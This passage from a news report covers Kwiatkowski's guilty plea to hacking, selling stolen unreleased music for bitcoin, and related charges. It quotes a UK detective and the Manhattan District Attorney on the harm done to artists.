In August, Kwiatkowski pleaded guilty at Ipswich Magistrates Court to three charges of unauthorised access to computer material, 14 charges of selling copyrighted material, one charge of converting criminal property and two charges of possession of criminal property.

He also admitted receiving bitcoin cryptocurrency for the songs.

Detective Constable Daryl Fryatt said Kwiatkowski was highly skilled but it was unfortunate he used his talents unlawfully.

“Not only did he cause several artists and their production companies significant financial harm, he deprived them of the ability to release their own work,” he added.

Manhattan District Attorney Alvin Bragg Jr said the case showed “cybercrime knows no borders”.

“This individual executed a complex scheme to steal unreleased music in order to line his own pockets,” he said.
